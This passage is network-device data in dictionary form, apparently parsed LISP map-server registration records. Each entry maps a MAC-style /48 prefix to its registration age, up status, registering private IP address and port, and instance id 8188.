"a4b2.39ff.1d1c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8188,
},
"a4b2.39ff.1d20/48": {
"last_register": "2d17h",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.1d24/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.1d34/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8188,
},
"a4b2.39ff.1d38/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8188,
},
"a4b2.39ff.1d3c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8188,
},
"a4b2.39ff.1d44/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8188,
},
"a4b2.39ff.1d48/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.1d50/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8188,
},
"a4b2.39ff.1d5c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8188,
},
"a4b2.39ff.1d64/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.1d68/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8188,
},
"a4b2.39ff.1d6c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8188,
},
"a4b2.39ff.1d70/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8188,
},
"a4b2.39ff.1d74/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8188,
},
"a4b2.39ff.1d78/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8188,
},
"a4b2.39ff.1d7c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8188,
},
"a4b2.39ff.1d80/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8188,
},
"a4b2.39ff.1d84/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8188,
},
"a4b2.39ff.1d8c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8188,
},
"a4b2.39ff.1d90/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8188,
},
"a4b2.39ff.1d94/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8188,
},
"a4b2.39ff.1d98/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8188,
},
"a4b2.39ff.1d9c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8188,
},
"a4b2.39ff.1dac/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8188,
},
"a4b2.39ff.1db0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8188,
},
"a4b2.39ff.1db4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8188,
},
"a4b2.39ff.1dbc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8188,
},
"a4b2.39ff.1dc0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8188,
},
"a4b2.39ff.1dc4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8188,
},
"a4b2.39ff.1dd4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8188,
},
"a4b2.39ff.1ddc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8188,
},
"a4b2.39ff.1de0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8188,
},
"a4b2.39ff.1de4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.124:39959",
"inst_id": 8188,
},
"a4b2.39ff.1dec/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8188,
},
"a4b2.39ff.1df8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8188,
},
"a4b2.39ff.1d01/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8188,
},
"a4b2.39ff.1d05/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8188,
},
"a4b2.39ff.1e08/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8188,
},
"a4b2.39ff.1e20/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8188,
},
"a4b2.39ff.1e30/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.94:39184",
"inst_id": 8188,
},
"a4b2.39ff.1e34/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8188,
},
"a4b2.39ff.1e40/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8188,
},
"a4b2.39ff.1e50/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8188,
},
"a4b2.39ff.1e54/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8188,
},
"a4b2.39ff.1e60/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.124:39959",
"inst_id": 8188,
},
"a4b2.39ff.1e68/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8188,
},
"a4b2.39ff.1e70/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8188,
},
"a4b2.39ff.1ea0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.1eb0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.1fc4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8188,
},
"a4b2.39ff.2018/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8188,
},
"a4b2.39ff.2024/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8188,
},
"a4b2.39ff.2028/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8188,
},
"a4b2.39ff.2040/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8188,
},
"a4b2.39ff.2054/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8188,
},
"a4b2.39ff.2058/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8188,
},
"a4b2.39ff.2114/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8188,
},
"a4b2.39ff.2134/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8188,
},
"a4b2.39ff.21e8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8188,
},
"a4b2.39ff.21f4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8188,
},
"a4b2.39ff.2228/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8188,
},
"a4b2.39ff.2240/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8188,
},
"a4b2.39ff.2248/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8188,
},
"a4b2.39ff.2254/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8188,
},
"a4b2.39ff.2284/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8188,
},
"a4b2.39ff.2288/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8188,
},
"a4b2.39ff.2294/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8188,
},
"a4b2.39ff.2298/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8188,
},
"a4b2.39ff.22b0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8188,
},
"a4b2.39ff.22e0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8188,
},
"a4b2.39ff.22e4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8188,
},
"a4b2.39ff.22e8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.22ec/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8188,
},
"a4b2.39ff.22f0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8188,
},
"a4b2.39ff.2205/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8188,
},
"a4b2.39ff.2310/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8188,
},
"a4b2.39ff.2318/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8188,
},
"a4b2.39ff.2320/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8188,
},
"a4b2.39ff.2324/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8188,
},
"a4b2.39ff.24a8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8188,
},
"a4b2.39ff.24b8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8188,
},
"a4b2.39ff.263c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8188,
},
"a4b2.39ff.264c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8188,
},
"a4b2.39ff.2668/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8188,
},
"a4b2.39ff.266c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.2678/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8188,
},
"a4b2.39ff.267c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8188,
},
"a4b2.39ff.2688/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8188,
},
"a4b2.39ff.268c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8188,
},
"a4b2.39ff.26a8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8188,
},
"a4b2.39ff.26ac/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8188,
},
"a4b2.39ff.26e0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8188,
},
"a4b2.39ff.26f0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8188,
},
"a4b2.39ff.26f4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8188,
},
"a4b2.39ff.2714/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8188,
},
"a4b2.39ff.272c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8188,
},
"a4b2.39ff.2734/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8188,
},
"a4b2.39ff.2750/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8188,
},
"a4b2.39ff.2764/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.2774/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8188,
},
"a4b2.39ff.2778/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8188,
},
"a4b2.39ff.2cd8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8188,
},
"a4b2.39ff.2d8c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8188,
},
"a4b2.39ff.2e7c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8188,
},
"a4b2.39ff.31dc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8188,
},
"a4b2.39ff.34cc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8188,
},
"a4b2.39ff.34f0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8188,
},
"a4b2.39ff.3984/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8188,
},
"a4b2.39ff.3ba4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8188,
},
"a4b2.39ff.3bac/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8188,
},
"a4b2.39ff.3bb0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8188,
},
"a4b2.39ff.3bb4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8188,
},
"a4b2.39ff.3bc0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8188,
},
"a4b2.39ff.3bcc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8188,
},
"a4b2.39ff.3bd0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8188,
},
"a4b2.39ff.4430/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.124:39959",
"inst_id": 8188,
},
"a4b2.39ff.4534/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8188,
},
"a4b2.39ff.46a8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.4720/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8188,
},
"a4b2.39ff.4724/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8188,
},
"a4b2.39ff.4728/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8188,
},
"a4b2.39ff.4734/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8188,
},
"a4b2.39ff.4738/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8188,
},
"a4b2.39ff.4750/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8188,
},
"a4b2.39ff.475c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8188,
},
"a4b2.39ff.47c0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8188,
},
"a4b2.39ff.47c4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8188,
},
"a4b2.39ff.47c8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8188,
},
"a4b2.39ff.47d4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8188,
},
"a4b2.39ff.47d8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8188,
},
"a4b2.39ff.47e0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8188,
},
"a4b2.39ff.47e4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8188,
},
"a4b2.39ff.47ec/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8188,
},
"a4b2.39ff.47f8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8188,
},
"a4b2.39ff.47fc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8188,
},
"a4b2.39ff.4701/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8188,
},
"a4b2.39ff.4705/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8188,
},
"a4b2.39ff.4808/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8188,
},
"a4b2.39ff.4810/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8188,
},
"a4b2.39ff.4814/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8188,
},
"a4b2.39ff.4818/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8188,
},
"a4b2.39ff.481c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8188,
},
"a4b2.39ff.4820/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8188,
},
"a4b2.39ff.4824/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8188,
},
"a4b2.39ff.482c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8188,
},
"a4b2.39ff.4830/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8188,
},
"a4b2.39ff.4834/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8188,
},
"a4b2.39ff.4838/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8188,
},
"a4b2.39ff.483c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8188,
},
"a4b2.39ff.4840/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8188,
},
"a4b2.39ff.4844/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8188,
},
"a4b2.39ff.4848/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8188,
},
"a4b2.39ff.484c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8188,
},
"a4b2.39ff.4850/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8188,
},
"a4b2.39ff.4854/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8188,
},
"a4b2.39ff.4858/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8188,
},
"a4b2.39ff.485c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8188,
},
"a4b2.39ff.4860/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8188,
},
"a4b2.39ff.4864/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8188,
},
"a4b2.39ff.4868/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8188,
},
"a4b2.39ff.486c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8188,
},
"a4b2.39ff.4870/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8188,
},
"a4b2.39ff.4874/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8188,
},
"a4b2.39ff.4878/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8188,
},
"a4b2.39ff.487c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8188,
},
"a4b2.39ff.4884/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8188,
},
"a4b2.39ff.4888/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8188,
},
"a4b2.39ff.4890/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8188,
},
"a4b2.39ff.4898/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8188,
},
"a4b2.39ff.489c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.94:39184",
"inst_id": 8188,
},
"a4b2.39ff.48a0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.124:39959",
"inst_id": 8188,
},
"a4b2.39ff.48a8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8188,
},
"a4b2.39ff.48ac/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8188,
},
"a4b2.39ff.48b0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8188,
},
"a4b2.39ff.48b4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8188,
},
"a4b2.39ff.48b8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8188,
},
"a4b2.39ff.48bc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8188,
},
"a4b2.39ff.48c0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8188,
},
"a4b2.39ff.48c8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8188,
},
"a4b2.39ff.48cc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8188,
},
"a4b2.39ff.48d0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8188,
},
"a4b2.39ff.48d4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8188,
},
"a4b2.39ff.48d8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8188,
},
"a4b2.39ff.48dc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8188,
},
"a4b2.39ff.48e0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8188,
},
"a4b2.39ff.48e4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8188,
},
"a4b2.39ff.48e8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8188,
},
"a4b2.39ff.48f0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8188,
},
"a4b2.39ff.48f4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8188,
},
"a4b2.39ff.48f8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8188,
},
"a4b2.39ff.48fc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8188,
},
"a4b2.39ff.4801/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8188,
},
"a4b2.39ff.4805/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8188,
},
"a4b2.39ff.4908/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8188,
},
"a4b2.39ff.490c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8188,
},
"a4b2.39ff.4910/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8188,
},
"a4b2.39ff.4914/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8188,
},
"a4b2.39ff.4918/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8188,
},
"a4b2.39ff.491c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8188,
},
"a4b2.39ff.4924/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8188,
},
"a4b2.39ff.4928/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8188,
},
"a4b2.39ff.492c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8188,
},
"a4b2.39ff.4930/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8188,
},
"a4b2.39ff.4934/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8188,
},
"a4b2.39ff.4938/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8188,
},
"a4b2.39ff.493c/48": {
"last_register": "2w1d",
